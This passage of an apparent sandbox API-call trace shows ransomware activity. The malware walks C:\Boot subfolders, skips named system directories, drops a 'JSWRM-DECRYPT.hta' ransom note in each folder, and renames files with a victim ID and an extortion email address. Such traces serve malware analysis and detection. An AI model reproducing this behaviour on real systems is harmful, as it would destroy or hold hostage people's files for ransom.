lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.463] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.464] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.464] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.464] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.464] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.464] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.465] CloseHandle (hObject=0xffffffff) returned 1 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0064.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.465] MoveFileW (lpExistingFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\zh-CN\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.465] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.465] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0064.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.476] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2=".") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="..") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="...") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="windows") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="recovery") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="perflogs") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="documents and settings") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="$RECYCLE.BIN") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="system volume information") returned 1 [0064.476] lstrcmpiW (lpString1="zh-HK", lpString2="msocache") returned 1 [0064.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.476] GetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-hk\\jswrm-decrypt.hta")) returned 0xffffffff [0064.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0064.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.477] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-hk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.477] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.478] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.478] CloseHandle (hObject=0x450) returned 1 [0064.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0064.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236fe8 [0064.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.480] GetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-hk\\jswrm-decrypt.hta")) returned 0x20 [0064.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236fe8 | out: hHeap=0x1e0000) returned 1 [0064.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.480] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d186442, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232200 [0064.480] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.480] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d186442, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.480] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.480] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.480] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.480] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.480] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.481] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.481] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.483] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.483] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.484] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.484] CloseHandle (hObject=0xffffffff) returned 1 [0064.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0064.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0064.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0064.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0064.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.485] MoveFileW (lpExistingFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.485] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d186442, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d186442, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d186442, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.485] lstrcmpiW 